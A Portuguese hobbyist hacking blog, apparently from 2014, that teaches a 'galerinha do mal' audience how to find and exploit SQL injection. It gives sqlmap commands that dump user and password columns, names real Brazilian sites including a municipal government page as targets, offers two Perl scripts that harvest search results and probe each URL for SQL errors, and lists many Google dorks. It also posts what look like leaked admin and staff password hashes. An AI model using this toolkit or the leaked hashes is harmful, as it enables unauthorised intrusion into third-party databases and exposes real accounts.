Neemias Pereira

terça-feira, 24 de março de 2015

https://www.youtube.com/watch?v=5RmCeQ3V5Sg

quinta-feira, 31 de julho de 2014

Login e Senha

usu_login usu_senha

admin 429fe284ba1c47b0a3a3c464d30d2023
jian c870e6222c32424cacf9426d6b37b070
imprensa 952abab20cb8d7def9aed23b9cc6a582
rhpublic 81ea47a187ea6423f1be7376bbdac6c8
tesouraria 7c3c705bae241555a174f4fbec616ae3
eliasdz 05e8e4e23220854f91b3025cf38304e4
imprensa2 77df8fbe72bf2601786001c656b62a3b
agri_ambiente ce4bdeddb4cd3a6536e6d71b803d7b6d

sexta-feira, 25 de julho de 2014

./sqlmap.py -h
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns
./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C 'uname,pass' --dump

http://www.euclidesdacunha.sp.gov.br/novo/noticias.php?ID=1

http://www.iseape.com.br/noticias.php?id=1

terça-feira, 22 de julho de 2014

Como achar sites vulneraveis a SQL injection

Fala ae galerinha do mal tudo bem ?kk
Hj vou estar ensinando a criar um scan que faz procuras por sites vulneraveis a SQL injection. Bom chega de papo e vamos la !

1° Passo baixe o programa ActivePerl-5.16.http://www.mediafire.com/download/wpvaa96vjcibsk1/ActivePerl-5.16.rar Para que possa rodar os arquivos !!!

2° Passo abra seu bloco de notas e cole este codigo :

#!/usr/bin/perl
#Coded: Brlo0ping
use LWP::UserAgent;
print "----|| Coded: Brlo0ping ||-----||Acc3ss ro0t:~# ----||\n";
print "Digite um dork: ex:(noticias.php?id=100)\n" ;
print "-->>";
$dork = <STDIN>;
chomp($dork);
for ($i = 0; $i < 1000; $i += 10) {
$b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
$b->timeout(30);
$b->env_proxy;
$c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
$check = index($c, 'sb_pagN');
while (1) {
$n = index($c, '<h3><a href="');
if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
open (txt,">>lista.txt");
print txt $s,"\n";
close(txt);
}
if ($check == -1) {
last;
}
}
system("lista.txt");
exit;

........................ .................. e salve na sua area de trabalho como scan.pl

3° Passo: abra novamente seu bloco de notas e cole este codigo:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");

if (!$ARGV[0]) {

$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");

my @bannerzinho = (0,100..200);
my $variavelbanner = $bannerzinho[int rand @bannerzinho];

if ($variavelbanner % 2 == 0) {

&bannerUm();
exit;

}
else {
&bannerDois();
exit;
}
}

&bannerDois();

print q {
Scaneando WebSite...

};

open( SITE, "< $ARGV[0]" ) or die( "Nao foi possível abrir o arquivo: $!" );

our @array = <SITE>;

$numero = $#array;

for ($i = 0; $i <= $numero; $i++) {

$Dominio = "$array[$i]";

if($Dominio !~ /http:\/\//) { $Dominio = "http://$Dominio"; }

$cmd = "'";

$site = "$Dominio$cmd";

my $req=HTTP::Request->new(GET=>$site);
my $ua=LWP::UserAgent->new();
$ua->timeout(15);
my $resposta=$ua->request($req);

if($resposta->content =~ /You have an error in your SQL syntax/ ||
$resposta->content =~ /MySQL server version/ ||
$resposta->content =~ /Syntax error converting the nvarchar value/ ||
$resposta->content =~ /Unclosed/ ||
$resposta->content =~ /SQL Server error/ ||
$resposta->content =~ /JET/) {

print "\n \t $Dominio \n";

open (NOTEPAD, ">> Sites Vulneraveis.txt");
print NOTEPAD "$site\n";
close(NOTEPAD);

}
}

print q {

FIM DO SCANNEAMENTO !

};

sub bannerUm {

print q {

_______________________
< Hello !! Welcome !! >
-----------------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_| Scanner v 1.0

Modo de uso: perl ScannerSQL.pl lista.txt
Scanner criado por: Loko Virtual

};

}

sub bannerDois {

print q {
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| Scanner v 1.0

Modo de uso: perl ScannerSQL.pl lista.txt
Scanner criado por: Loko Virtual

};

}

........................ .................... e salve como sql.pl na sua area de trabalho!

4° Passo: Execute o scan.pl
Agora vc terá que colocar uma DORK EX: noticias.php?id=12 --->voce pode estar utilizando outros --->
Vamo la

Digite: noticias.php?id=12 e de enter
Vai começar a fazer um scan em todos os sites que tem esta DORK e ira criar um arquivo chamado "lista.txt" depois se você quiser parar é so apertar Ctrl + C.

5° Passo: agora abra seu CMD: pra quem não sabe aperte iniciar + R e ira abrir uma caixa de dialogo e digite cmd e de enter.

6° la vai estar na seguinte pasta -
C:\Users\USER>

Digite cd desktop e de enter e vai ficar assim:

C:\Users\USER\Desktop>

Digite sql.pl lista.txt e de enter /////e agora vai começar o scan e ira criar um arquivo txt chamado Sites Vulneraveis.

Pronto heuheuhe até que enfim , intao é isso espero que gostem e se ainda tem duvidas comenta ae em baixo que assim que eu tiver tempo eu respondo EEE tchauu!!!

Google Dorks

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=

inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=